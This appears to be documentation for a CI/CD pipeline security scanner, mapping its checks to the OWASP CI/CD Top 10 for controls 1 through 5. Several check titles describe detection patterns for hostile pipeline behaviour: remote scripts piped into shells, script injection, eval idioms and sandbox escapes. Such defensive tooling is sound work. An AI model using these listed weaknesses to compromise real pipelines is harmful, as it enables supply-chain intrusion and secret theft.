
OWASP Top 10 CI/CD Security Risks

The OWASP CI/CD Top 10 is the canonical risk taxonomy this scanner organizes around. Every other compliance standard's check set is a subset of OWASP's; the cross-standard integrity test in tests/test_standards.py enforces this. When a check fails, it is because at least one OWASP risk fires; the other 13 frameworks layer their own labels on top of the same evidence.
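That subset invariant lends itself to a property test. A minimal sketch, assuming a registry shaped like a dict from standard name to check-ID set; the real registry shape and the contents of tests/test_standards.py are not shown here:

```python
# Hypothetical sketch of the cross-standard integrity invariant:
# every other standard's check set must be a subset of OWASP's.
# CHECKS_BY_STANDARD is an assumed registry shape, not the scanner's real API.
CHECKS_BY_STANDARD = {
    "owasp_cicd_top_10": {"GHA-001", "GHA-002", "IAM-001", "SCM-001"},
    "nist_ssdf": {"GHA-001", "IAM-001"},
    "slsa": {"GHA-001", "SCM-001"},
}

def test_every_standard_is_subset_of_owasp():
    owasp = CHECKS_BY_STANDARD["owasp_cicd_top_10"]
    for name, checks in CHECKS_BY_STANDARD.items():
        assert checks <= owasp, f"{name} cites checks outside the OWASP set"
```

A test like this is what guarantees that a finding under any other framework always maps back to at least one OWASP risk.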

Use this page when you want full coverage of the canonical CI/CD risk model; pick a more specialized framework (NIST SSDF, SLSA, CIS Kubernetes, …) when an audit asks for that framework's vocabulary.

At a glance

  • Controls in this standard: 10
  • Controls evidenced by at least one check: 10 / 10
  • Distinct checks evidencing this standard: 485
  • Of those, autofixable with --fix: 111

How to read severity

Every check below ships at a fixed severity level. The scale is the same across providers and standards, so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.

Level What it means Examples
CRITICAL Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. Hardcoded credential literal, branch ref pointing at a known-compromised action, sign-in to an unverified registry.
HIGH Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod.
MEDIUM Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window.
LOW Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push.
INFO Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed.
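An ordered scale like this is naturally modeled as a comparable enum, so a threshold filter ("fail only on HIGH and above") becomes a single comparison. A minimal sketch; the enum and helper are illustrative, not the scanner's API:

```python
from enum import IntEnum

class Severity(IntEnum):
    # Ordered so comparisons express "at least this severe".
    INFO = 0
    LOW = 1
    MEDIUM = 2
    HIGH = 3
    CRITICAL = 4

def at_least(findings, threshold):
    """Keep (check_id, severity) pairs at or above a threshold."""
    return [f for f in findings if f[1] >= threshold]

findings = [("GHA-001", Severity.HIGH), ("DF-009", Severity.LOW)]
print(at_least(findings, Severity.MEDIUM))  # only the HIGH finding survives
```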

Coverage by control

Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info).

Control Title Checks Severity mix
CICD-SEC-1 Insufficient Flow Control Mechanisms 47 2C · 23H · 20M · 2L
CICD-SEC-2 Inadequate Identity and Access Management 30 2C · 17H · 10M · 1L
CICD-SEC-3 Dependency Chain Abuse 125 1C · 64H · 46M · 14L
CICD-SEC-4 Poisoned Pipeline Execution 72 20C · 40H · 10M · 2L
CICD-SEC-5 Insufficient PBAC 21 3C · 13H · 5M
CICD-SEC-6 Insufficient Credential Hygiene 57 25C · 18H · 14M
CICD-SEC-7 Insecure System Configuration 87 22C · 27H · 31M · 7L
CICD-SEC-8 Ungoverned Usage of 3rd-Party Services 8 4C · 2H · 2M
CICD-SEC-9 Improper Artifact Integrity Validation 62 1C · 12H · 43M · 6L
CICD-SEC-10 Insufficient Logging and Visibility 42 3H · 12M · 11L · 16I

Filter at runtime

Restrict a scan to checks that evidence this standard with --standard owasp_cicd_top_10:

# All providers, only checks tied to this standard
pipeline_check --standard owasp_cicd_top_10

# Compose with --pipeline to scope by provider
pipeline_check --pipeline github --standard owasp_cicd_top_10

# Compose with another standard to widen the lens
pipeline_check --pipeline aws --standard owasp_cicd_top_10 --standard nist_ssdf
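As the last example shows, repeating --standard widens the selection to the union of both check sets. A hedged sketch of how such repeatable flags parse, assuming nothing about the real CLI's internals:

```python
import argparse

# Illustrative parser for the flags shown above; the real pipeline_check
# CLI's internals are not documented here.
parser = argparse.ArgumentParser(prog="pipeline_check")
parser.add_argument("--pipeline", action="append", default=None)
parser.add_argument("--standard", action="append", default=None)

args = parser.parse_args(
    ["--pipeline", "aws", "--standard", "owasp_cicd_top_10", "--standard", "nist_ssdf"]
)
# Each repeated --standard appends; the union of their check sets runs.
selected = set(args.standard)
print(selected)
```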

Controls in scope

CICD-SEC-1: Insufficient Flow Control Mechanisms

Reviews, approvals, branch protection, and deployment gates are the brakes on the pipeline. Missing them lets a single commit, or a single API call, ship straight to production.

Evidenced by 47 checks across 12 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Drone CI, GitHub Actions, GitLab CI, Jenkins, SCM, Tekton).

Check Title Severity Provider Fix
ADO-004 Deployment job missing environment binding MEDIUM Azure DevOps
ARGO-005 Argo input parameter interpolated unsafely in script / args CRITICAL Argo Workflows
BB-004 Deploy step missing deployment: environment gate MEDIUM Bitbucket
BK-004 Remote script piped into shell interpreter HIGH Buildkite 🔧 fix
BK-013 Deploy step has no branches: filter MEDIUM Buildkite
BK-015 agents map interpolates attacker-controllable Buildkite variable HIGH Buildkite
CB-007 CodeBuild webhook has no filter group MEDIUM AWS
CC-009 Deploy job missing manual approval gate MEDIUM CircleCI
CC-013 Deploy job in workflow has no branch filter MEDIUM CircleCI
CCM-001 CodeCommit repository has no approval rule template attached HIGH AWS
CD-001 Automatic rollback on failure not enabled MEDIUM AWS
CD-002 AllAtOnce deployment config, no canary or rolling strategy HIGH AWS
CP-001 No approval action before deploy stages HIGH AWS
CP-005 Production Deploy stage has no preceding ManualApproval MEDIUM AWS
DR-003 Untrusted Drone template variable in shell command HIGH Drone CI
DR-006 TLS verification disabled in step commands HIGH Drone CI
DR-009 Cache plugin key embeds an attacker-controllable Drone variable HIGH Drone CI
DR-011 node map interpolates attacker-controllable Drone variable HIGH Drone CI
GHA-014 Deploy job missing environment binding MEDIUM GitHub Actions 🔧 fix
GL-004 Deploy job lacks manual approval or environment gate MEDIUM GitLab CI
GL-029 Manual deploy job defaults to allow_failure: true MEDIUM GitLab CI
GL-033 Global before_script / after_script propagates taint to every job HIGH GitLab CI
JF-005 Deploy stage missing manual input approval MEDIUM Jenkins
JF-024 input approval step missing submitter restriction MEDIUM Jenkins
SCM-001 Default branch has no protection rule HIGH SCM
SCM-002 Default branch protection does not require pull request reviews HIGH SCM
SCM-006 Default branch protection does not require signed commits MEDIUM SCM
SCM-007 Default branch protection allows force-pushes HIGH SCM
SCM-008 Default branch protection does not require status checks MEDIUM SCM
SCM-009 Default branch protection allows branch deletion HIGH SCM
SCM-010 Branch protection allows administrators to bypass HIGH SCM
SCM-011 Default branch protection does not require CODEOWNERS reviews MEDIUM SCM
SCM-012 Default branch protection keeps stale reviews after a push MEDIUM SCM
SCM-013 Default branch protection does not require conversation resolution LOW SCM
SCM-014 Default branch protection does not require approval of the most recent push MEDIUM SCM
SCM-017 Repository has no CODEOWNERS file MEDIUM SCM
SCM-018 Required PR reviews can be bypassed by named identities MEDIUM SCM
SCM-019 Push restrictions allowlist names individual users LOW SCM
TAINT-001 Untrusted input flows across step boundaries via step outputs HIGH GitHub Actions
TAINT-002 Untrusted input flows across jobs via jobs.<id>.outputs: HIGH GitHub Actions
TAINT-003 Untrusted input forwarded into reusable workflow with: HIGH GitHub Actions
TAINT-004 Untrusted input flows across jobs via dotenv artifact HIGH GitLab CI
TAINT-005 Untrusted input flows across steps via buildkite-agent meta-data HIGH Buildkite
TAINT-006 Untrusted input flows across tasks via Tekton results HIGH Tekton
TAINT-007 Untrusted input flows across templates via Argo outputs.parameters HIGH Argo Workflows
TAINT-008 Untrusted input flows via GitLab extends: template inheritance HIGH GitLab CI
TKN-003 Tekton param interpolated unsafely in step script CRITICAL Tekton

CICD-SEC-2: Inadequate Identity and Access Management

Long-lived static credentials, shared service accounts, and human identities reused for automation expand the blast radius of a single compromise to the whole pipeline.
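Checks like IAM-002 boil down to walking the policy document for over-broad grants. A minimal sketch against the standard AWS policy JSON shape; the helper itself is hypothetical:

```python
# Illustrative sketch in the spirit of IAM-002: flag IAM policy statements
# that Allow a wildcard Action. The input follows the standard AWS
# policy-document JSON shape; the helper name is an assumption.
def has_wildcard_action(policy: dict) -> bool:
    for stmt in policy.get("Statement", []):
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        if stmt.get("Effect") == "Allow" and any(
            a == "*" or a.endswith(":*") for a in actions
        ):
            return True
    return False

risky = {"Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
print(has_wildcard_action(risky))  # True
```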

Evidenced by 30 checks across 12 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Kubernetes, OCI manifest, Tekton).

Check Title Severity Provider Fix
ADO-029 Service-connection-using job without environment or branch gate HIGH Azure DevOps
ARGO-003 Argo workflow uses the default ServiceAccount MEDIUM Argo Workflows
ARGO-013 Argo workflow does not opt out of SA token automount MEDIUM Argo Workflows
ATTEST-001 SLSA provenance attests an untrusted builder identity HIGH OCI manifest
BB-028 OIDC step without deployment-gated environment HIGH Bitbucket
BK-007 Deploy step not gated by a manual block / input MEDIUM Buildkite
CA-004 CodeArtifact repo policy grants codeartifact:* with Resource '*' HIGH AWS
CC-031 OIDC role assumption without branch filter or approval gate HIGH CircleCI
GCB-002 Cloud Build uses the default service account HIGH Cloud Build
GCB-020 serviceAccount points at the default Cloud Build service account HIGH Cloud Build
GHA-030 OIDC token requested without environment-protected job HIGH GitHub Actions
GHA-034 Reusable workflow called with secrets: inherit MEDIUM GitHub Actions 🔧 fix
GL-031 id_tokens: missing audience pin or environment binding HIGH GitLab CI
IAM-001 CI/CD role has AdministratorAccess policy attached CRITICAL AWS
IAM-002 CI/CD role has wildcard Action in attached policy HIGH AWS
IAM-003 CI/CD role has no permission boundary MEDIUM AWS
IAM-004 CI/CD role can PassRole to any role HIGH AWS
IAM-005 CI/CD role trust policy missing sts:ExternalId HIGH AWS
IAM-006 Sensitive actions granted with wildcard Resource MEDIUM AWS
IAM-008 OIDC-federated role trust policy missing audience or subject pin HIGH AWS
K8S-011 Pod serviceAccountName unset or 'default' MEDIUM Kubernetes
K8S-012 Pod automountServiceAccountToken not false MEDIUM Kubernetes
K8S-019 Workload deployed in the 'default' namespace LOW Kubernetes
K8S-020 ClusterRoleBinding grants cluster-admin or system:masters CRITICAL Kubernetes 🔧 fix
K8S-021 Role or ClusterRole grants wildcard verbs+resources HIGH Kubernetes
K8S-025 System priority class used outside kube-system HIGH Kubernetes
K8S-029 RoleBinding grants permissions to the default ServiceAccount HIGH Kubernetes 🔧 fix
K8S-034 ServiceAccount automountServiceAccountToken not explicitly false MEDIUM Kubernetes
KMS-002 KMS key policy grants wildcard KMS actions HIGH AWS
TKN-007 Tekton run uses the default ServiceAccount MEDIUM Tekton

CICD-SEC-3: Dependency Chain Abuse

Floating tags, version-range constraints, and unverified registries mean an upstream maintainer compromise (or a typosquat) executes in your build the next time the dependency resolves.
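The common thread in the digest-pin checks below (DF-001, K8S-001, GL-009, and peers) is that only a sha256 digest makes an image reference immutable. A minimal sketch of such a test; the helper is illustrative:

```python
import re

# Illustrative sketch of a digest-pin check: a tag can be repointed by
# the registry at any time, while an @sha256 digest is content-addressed.
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")

def pinned_by_digest(image_ref: str) -> bool:
    return bool(DIGEST_RE.search(image_ref))

print(pinned_by_digest("python:3.12"))                # False: floating tag
print(pinned_by_digest("python@sha256:" + "a" * 64))  # True: immutable
```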

Evidenced by 125 checks across 17 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, OCI manifest, SCM, Tekton).

Check Title Severity Provider Fix
ADO-001 Task reference not pinned to specific version HIGH Azure DevOps 🔧 fix
ADO-005 Container image not pinned to specific version HIGH Azure DevOps
ADO-009 Container image pinned by tag rather than sha256 digest LOW Azure DevOps
ADO-016 Remote script piped to shell interpreter HIGH Azure DevOps 🔧 fix
ADO-018 Package install from insecure source HIGH Azure DevOps 🔧 fix
ADO-020 No vulnerability scanning step MEDIUM Azure DevOps
ADO-021 Package install without lockfile enforcement MEDIUM Azure DevOps 🔧 fix
ADO-022 Dependency update command bypasses lockfile pins MEDIUM Azure DevOps 🔧 fix
ADO-023 TLS / certificate verification bypass HIGH Azure DevOps 🔧 fix
ADO-025 Cross-repo template not pinned to commit SHA HIGH Azure DevOps
ADO-028 Package install bypasses registry integrity (git / path / tarball source) MEDIUM Azure DevOps
ARGO-001 Argo template container image not pinned to a digest HIGH Argo Workflows
ARGO-008 Argo script source pipes remote install or disables TLS HIGH Argo Workflows 🔧 fix
ARGO-014 Argo template script runs unpinned package install MEDIUM Argo Workflows
ARGO-015 Input artifact pulls from an insecure (non-HTTPS) URL HIGH Argo Workflows
ATTEST-001 SLSA provenance attests an untrusted builder identity HIGH OCI manifest
ATTEST-002 SLSA provenance source-repo claim is missing or unverifiable HIGH OCI manifest
ATTEST-003 SBOM contains floating-version dependencies MEDIUM OCI manifest
BB-001 pipe: action not pinned to exact version HIGH Bitbucket 🔧 fix
BB-009 pipe: pinned by version rather than sha256 digest LOW Bitbucket
BB-012 Remote script piped to shell interpreter HIGH Bitbucket 🔧 fix
BB-014 Package install from insecure source HIGH Bitbucket 🔧 fix
BB-015 No vulnerability scanning step MEDIUM Bitbucket
BB-021 Package install without lockfile enforcement MEDIUM Bitbucket 🔧 fix
BB-022 Dependency update command bypasses lockfile pins MEDIUM Bitbucket 🔧 fix
BB-023 TLS / certificate verification bypass HIGH Bitbucket 🔧 fix
BB-027 Package install bypasses registry integrity (git / path / tarball source) MEDIUM Bitbucket
BB-029 image: (step or service) not pinned by sha256 digest HIGH Bitbucket
BK-001 Buildkite plugin not pinned to an exact version HIGH Buildkite
BK-004 Remote script piped into shell interpreter HIGH Buildkite 🔧 fix
BK-008 TLS verification disabled in step command MEDIUM Buildkite 🔧 fix
BK-014 Step commands run unpinned package installs MEDIUM Buildkite
CA-002 CodeArtifact repository has a public external connection HIGH AWS
CB-009 CodeBuild image not pinned by digest MEDIUM AWS
CC-001 Orb not pinned to exact semver HIGH CircleCI 🔧 fix
CC-003 Docker image not pinned by digest HIGH CircleCI
CC-016 Remote script piped to shell interpreter HIGH CircleCI 🔧 fix
CC-018 Package install from insecure source HIGH CircleCI 🔧 fix
CC-020 No vulnerability scanning step MEDIUM CircleCI
CC-021 Package install without lockfile enforcement MEDIUM CircleCI 🔧 fix
CC-022 Dependency update command bypasses lockfile pins MEDIUM CircleCI 🔧 fix
CC-023 TLS / certificate verification bypass HIGH CircleCI 🔧 fix
CC-028 Package install bypasses registry integrity (git / path / tarball source) MEDIUM CircleCI
CC-029 Machine executor image not pinned HIGH CircleCI
DF-001 FROM image not pinned to sha256 digest HIGH Dockerfile 🔧 fix
DF-003 ADD pulls remote URL without integrity verification HIGH Dockerfile
DF-004 RUN executes a remote script via curl-pipe / wget-pipe HIGH Dockerfile
DF-009 ADD used where COPY would suffice LOW Dockerfile
DF-010 apt-get dist-upgrade / upgrade pulls unknown package versions LOW Dockerfile
DF-016 Image lacks OCI provenance labels LOW Dockerfile
DR-001 Step image not pinned to a digest HIGH Drone CI
DR-005 Plugin step uses a floating image tag HIGH Drone CI
DR-006 TLS verification disabled in step commands HIGH Drone CI
DR-008 Step uses pull: never (skips registry verification) MEDIUM Drone CI
DR-009 Cache plugin key embeds an attacker-controllable Drone variable HIGH Drone CI
DR-010 Step commands run unpinned package installs MEDIUM Drone CI
ECR-001 Image scanning on push not enabled HIGH AWS
ECR-006 ECR pull-through cache rule uses an untrusted upstream HIGH AWS
ECR-007 Inspector v2 enhanced scanning disabled for ECR MEDIUM AWS
GCB-001 Cloud Build step image not pinned by digest HIGH Cloud Build 🔧 fix
GCB-008 No vulnerability scanning step in Cloud Build pipeline MEDIUM Cloud Build
GCB-010 Remote script piped to shell interpreter HIGH Cloud Build
GCB-011 TLS / certificate verification bypass HIGH Cloud Build 🔧 fix
GCB-013 Package install bypasses registry integrity (git / path / tarball) MEDIUM Cloud Build
GCB-017 Image-producing build does not request SLSA provenance MEDIUM Cloud Build
GHA-001 Action not pinned to commit SHA HIGH GitHub Actions 🔧 fix
GHA-016 Remote script piped to shell interpreter HIGH GitHub Actions 🔧 fix
GHA-018 Package install from insecure source HIGH GitHub Actions 🔧 fix
GHA-020 No vulnerability scanning step MEDIUM GitHub Actions
GHA-021 Package install without lockfile enforcement MEDIUM GitHub Actions 🔧 fix
GHA-022 Dependency update command bypasses lockfile pins MEDIUM GitHub Actions 🔧 fix
GHA-023 TLS / certificate verification bypass HIGH GitHub Actions 🔧 fix
GHA-025 Reusable workflow not pinned to commit SHA HIGH GitHub Actions
GHA-029 Package install bypasses registry integrity (git / path / tarball source) MEDIUM GitHub Actions
GHA-040 Action reference matches a known-compromised SHA or tag CRITICAL GitHub Actions
GHA-041 Action upstream repo has a single contributor MEDIUM GitHub Actions
GHA-042 Action upstream repo is newly created MEDIUM GitHub Actions
GHA-043 Low-star action runs with sensitive permissions HIGH GitHub Actions
GHA-047 Action ref resolves to a recently committed tag or SHA MEDIUM GitHub Actions
GL-001 Image not pinned to specific version or digest HIGH GitLab CI 🔧 fix
GL-005 include: pulls remote / project without pinned ref HIGH GitLab CI
GL-009 Image pinned to version tag rather than sha256 digest LOW GitLab CI
GL-016 Remote script piped to shell interpreter HIGH GitLab CI 🔧 fix
GL-018 Package install from insecure source HIGH GitLab CI 🔧 fix
GL-019 No vulnerability scanning step MEDIUM GitLab CI
GL-021 Package install without lockfile enforcement MEDIUM GitLab CI 🔧 fix
GL-022 Dependency update command bypasses lockfile pins MEDIUM GitLab CI 🔧 fix
GL-023 TLS / certificate verification bypass HIGH GitLab CI 🔧 fix
GL-027 Package install bypasses registry integrity (git / path / tarball source) MEDIUM GitLab CI
GL-028 services: image not pinned HIGH GitLab CI
GL-030 trigger: include: pulls child pipeline without pinned ref HIGH GitLab CI
HELM-001 Chart.yaml declares legacy apiVersion: v1 MEDIUM Helm 🔧 fix
HELM-002 Chart.lock missing per-dependency digests HIGH Helm 🔧 fix
HELM-003 Chart dependency declared on a non-HTTPS repository HIGH Helm 🔧 fix
HELM-004 Chart dependency version is a range, not an exact pin MEDIUM Helm
HELM-005 Chart maintainers field empty or missing chain-of-custody info LOW Helm
HELM-006 Chart.yaml does not declare a kubeVersion compatibility range LOW Helm
HELM-007 Chart.yaml description field is empty or missing LOW Helm
HELM-008 Chart.lock generated more than 90 days ago MEDIUM Helm
HELM-009 Chart home / sources URL uses a non-HTTPS scheme LOW Helm
HELM-010 Chart.yaml appVersion field is empty or missing LOW Helm
JF-001 Shared library not pinned to a tag or commit HIGH Jenkins
JF-009 Agent docker image not pinned to sha256 digest HIGH Jenkins
JF-012 load step pulls Groovy from disk without integrity pin MEDIUM Jenkins
JF-016 Remote script piped to shell interpreter HIGH Jenkins 🔧 fix
JF-018 Package install from insecure source HIGH Jenkins 🔧 fix
JF-020 No vulnerability scanning step MEDIUM Jenkins
JF-021 Package install without lockfile enforcement MEDIUM Jenkins 🔧 fix
JF-022 Dependency update command bypasses lockfile pins MEDIUM Jenkins 🔧 fix
JF-023 TLS / certificate verification bypass HIGH Jenkins 🔧 fix
JF-031 Package install bypasses registry integrity (git / path / tarball source) MEDIUM Jenkins
K8S-001 Container image not pinned by sha256 digest HIGH Kubernetes 🔧 fix
K8S-036 ServiceAccount imagePullSecrets references missing Secret MEDIUM Kubernetes
OCI-001 Image manifest is missing OCI provenance annotations MEDIUM OCI manifest
OCI-002 Image is missing a build attestation manifest HIGH OCI manifest
OCI-003 Image manifest is missing the image.created annotation LOW OCI manifest
OCI-004 Image layer references an arbitrary URL (foreign layer) HIGH OCI manifest
OCI-005 Image manifest is missing the image.licenses annotation LOW OCI manifest
OCI-006 Image has an excessive layer count LOW OCI manifest
OCI-007 Image manifest uses legacy schemaVersion 1 (no content addressing) HIGH OCI manifest
OCI-008 Manifest references digest using unsupported hash algorithm HIGH OCI manifest
SCM-005 Dependabot security updates are not enabled MEDIUM SCM
TKN-001 Tekton step image not pinned to a digest HIGH Tekton
TKN-008 Tekton step script pipes remote install or disables TLS HIGH Tekton 🔧 fix
TKN-014 Tekton step script runs unpinned package install MEDIUM Tekton

CICD-SEC-4: Poisoned Pipeline Execution

An attacker who can influence what a build runs, via a PR, an issue comment, or a tainted environment variable, executes with the build's secrets and write-access to your artifacts.
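Injection checks like GHA-003 look for attacker-controllable event context interpolated directly into a run: block. A minimal sketch with a deliberately small context list; the real check covers far more contexts:

```python
import re

# Illustrative sketch in the spirit of GHA-003: a run: block that inlines
# attacker-controllable event context is shell-injectable. The three
# contexts matched here are a small sample, not the scanner's full set.
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.event\.(issue|pull_request|comment)\.[\w.]+\s*\}\}"
)

def injectable(run_block: str) -> bool:
    return bool(UNTRUSTED.search(run_block))

print(injectable('echo "${{ github.event.pull_request.title }}"'))  # True
print(injectable('echo "$TITLE"'))  # False: env-var indirection is safe
```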

Evidenced by 72 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Jenkins, Tekton).

Check Title Severity Provider Fix
ADO-002 Script injection via attacker-controllable context HIGH Azure DevOps
ADO-010 Cross-pipeline download: ingestion unverified CRITICAL Azure DevOps
ADO-011 template: <local-path> on PR-validated pipeline HIGH Azure DevOps
ADO-012 Cache@2 key derives from $(System.PullRequest.*) MEDIUM Azure DevOps
ADO-019 extends: template on PR-validated pipeline points to local path CRITICAL Azure DevOps
ADO-026 Pipeline contains indicators of malicious activity CRITICAL Azure DevOps
ADO-027 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Azure DevOps
ARGO-005 Argo input parameter interpolated unsafely in script / args CRITICAL Argo Workflows
BB-002 Script injection via attacker-controllable context HIGH Bitbucket
BB-010 Deploy step ingests pull-request artifact unverified CRITICAL Bitbucket
BB-018 Cache key derives from attacker-controllable input MEDIUM Bitbucket
BB-025 Pipeline contains indicators of malicious activity CRITICAL Bitbucket
BB-026 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Bitbucket
BK-003 Untrusted Buildkite variable interpolated in command HIGH Buildkite
CB-008 CodeBuild buildspec is inline (not sourced from a protected repo) HIGH AWS
CB-010 CodeBuild webhook allows fork-PR builds without actor filtering HIGH AWS
CB-011 CodeBuild buildspec contains indicators of malicious activity CRITICAL AWS
CC-002 Script injection via untrusted environment variable HIGH CircleCI
CC-012 Dynamic config via setup: true enables code injection MEDIUM CircleCI
CC-025 Cache key derives from attacker-controllable input MEDIUM CircleCI
CC-026 Config contains indicators of malicious activity CRITICAL CircleCI
CC-027 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH CircleCI
CP-003 Source stage using polling instead of event-driven trigger LOW AWS
CP-007 CodePipeline v2 PR trigger accepts all branches HIGH AWS
DF-005 RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH Dockerfile
DR-003 Untrusted Drone template variable in shell command HIGH Drone CI
GCB-004 dynamicSubstitutions enabled with user substitutions in step args HIGH Cloud Build
GCB-006 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Cloud Build
GCB-016 Step dir field contains parent-directory escape (..) MEDIUM Cloud Build
GCB-019 Shell entrypoint inlines a user substitution into args HIGH Cloud Build
GCB-022 options.substitutionOption set to ALLOW_LOOSE LOW Cloud Build 🔧 fix
GCB-023 Step references a user substitution not declared in substitutions: MEDIUM Cloud Build
GCB-026 Step waitFor: references an unknown step id MEDIUM Cloud Build
GHA-002 pull_request_target checks out PR head CRITICAL GitHub Actions 🔧 fix
GHA-003 Script injection via untrusted context HIGH GitHub Actions 🔧 fix
GHA-009 workflow_run downloads upstream artifact unverified CRITICAL GitHub Actions
GHA-010 Local action (./path) on untrusted-trigger workflow HIGH GitHub Actions
GHA-011 Cache key derives from attacker-controllable input MEDIUM GitHub Actions
GHA-013 issue_comment trigger without author guard HIGH GitHub Actions
GHA-027 Workflow contains indicators of malicious activity CRITICAL GitHub Actions
GHA-028 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH GitHub Actions
GHA-031 Workflow uses retired set-output / save-state command HIGH GitHub Actions
GHA-032 run: invokes local script on untrusted-trigger workflow CRITICAL GitHub Actions
GHA-035 github-script step interpolates untrusted context HIGH GitHub Actions
GHA-037 actions/checkout persists GITHUB_TOKEN into .git/config HIGH GitHub Actions
GHA-038 Workflow re-enables retired ::set-env / ::add-path commands CRITICAL GitHub Actions
GHA-044 Build tool runs lifecycle scripts on untrusted-trigger workflow HIGH GitHub Actions
GHA-045 Caller-controlled ref input feeds actions/checkout HIGH GitHub Actions
GHA-046 Manual PR-head fetch on untrusted-trigger workflow CRITICAL GitHub Actions
GL-002 Script injection via untrusted commit/MR context HIGH GitLab CI
GL-010 Multi-project pipeline ingests upstream artifact unverified CRITICAL GitLab CI
GL-011 include: local file pulled in MR-triggered pipeline HIGH GitLab CI
GL-012 Cache key derives from MR-controlled CI variable MEDIUM GitLab CI
GL-025 Pipeline contains indicators of malicious activity CRITICAL GitLab CI
GL-026 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH GitLab CI
GL-033 Global before_script / after_script propagates taint to every job HIGH GitLab CI
JF-002 Script step interpolates attacker-controllable env var HIGH Jenkins
JF-013 copyArtifacts ingests another job's output unverified CRITICAL Jenkins
JF-019 Groovy sandbox escape pattern detected CRITICAL Jenkins
JF-026 build job: trigger ignores downstream failure MEDIUM Jenkins
JF-029 Jenkinsfile contains indicators of malicious activity CRITICAL Jenkins
JF-030 Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH Jenkins
TAINT-001 Untrusted input flows across step boundaries via step outputs HIGH GitHub Actions
TAINT-002 Untrusted input flows across jobs via jobs.<id>.outputs: HIGH GitHub Actions
TAINT-003 Untrusted input forwarded into reusable workflow with: HIGH GitHub Actions
TAINT-004 Untrusted input flows across jobs via dotenv artifact HIGH GitLab CI
TAINT-005 Untrusted input flows across steps via buildkite-agent meta-data HIGH Buildkite
TAINT-006 Untrusted input flows across tasks via Tekton results HIGH Tekton
TAINT-007 Untrusted input flows across templates via Argo outputs.parameters HIGH Argo Workflows
TAINT-008 Untrusted input flows via GitLab extends: template inheritance HIGH GitLab CI
TKN-003 Tekton param interpolated unsafely in step script CRITICAL Tekton
TKN-015 Workspace subPath interpolates a Task parameter (path traversal) HIGH Tekton

CICD-SEC-5: Insufficient PBAC (Pipeline-Based Access Controls)

Build steps with deploy-class permissions, jobs sharing a single broad role, and missing environment gates each let a routine compromise escalate from build to production.
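A PBAC check like DR-002 or TKN-002 is a walk over container security contexts. A minimal sketch against an assumed parsed-spec shape:

```python
# Illustrative sketch in the spirit of DR-002 / TKN-002: a container
# running privileged or as root breaks executor isolation. The dict
# shape mimics a parsed pod/step spec; names are assumptions.
def privileged_containers(pod_spec: dict) -> list[str]:
    hits = []
    for c in pod_spec.get("containers", []):
        sec = c.get("securityContext", {})
        if sec.get("privileged") or sec.get("runAsUser") == 0:
            hits.append(c["name"])
    return hits

spec = {"containers": [
    {"name": "build", "securityContext": {"privileged": True}},
    {"name": "lint", "securityContext": {"runAsNonRoot": True}},
]}
print(privileged_containers(spec))  # ['build']
```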

Evidenced by 21 checks across 9 providers (AWS, Argo Workflows, Buildkite, CircleCI, Drone CI, GitHub Actions, Jenkins, Kubernetes, Tekton).

Check Title Severity Provider Fix
ARGO-002 Argo template container runs privileged or as root HIGH Argo Workflows
ARGO-004 Argo workflow mounts hostPath or shares host namespaces CRITICAL Argo Workflows
BK-005 Container started with --privileged or host-bind escalation HIGH Buildkite 🔧 fix
CC-014 Job missing resource_class declaration MEDIUM CircleCI
DR-002 Step runs with privileged: true HIGH Drone CI
DR-007 Step mounts a sensitive host path HIGH Drone CI
GHA-004 Workflow has no explicit permissions block MEDIUM GitHub Actions 🔧 fix
GHA-043 Low-star action runs with sensitive permissions HIGH GitHub Actions
JF-003 Pipeline uses agent any (no executor isolation) MEDIUM Jenkins
K8S-020 ClusterRoleBinding grants cluster-admin or system:masters CRITICAL Kubernetes 🔧 fix
K8S-021 Role or ClusterRole grants wildcard verbs+resources HIGH Kubernetes
K8S-025 System priority class used outside kube-system HIGH Kubernetes
K8S-029 RoleBinding grants permissions to the default ServiceAccount HIGH Kubernetes 🔧 fix
PBAC-001 CodeBuild project has no VPC configuration HIGH AWS
PBAC-002 CodeBuild service role shared across multiple projects MEDIUM AWS
PBAC-003 CodeBuild security group allows 0.0.0.0/0 all-port egress MEDIUM AWS
PBAC-005 CodePipeline stage action roles mirror the pipeline role HIGH AWS
TKN-002 Tekton step runs privileged or as root HIGH Tekton
TKN-004 Tekton Task mounts hostPath or shares host namespaces CRITICAL Tekton
TKN-013 Tekton sidecar runs privileged or as root HIGH Tekton
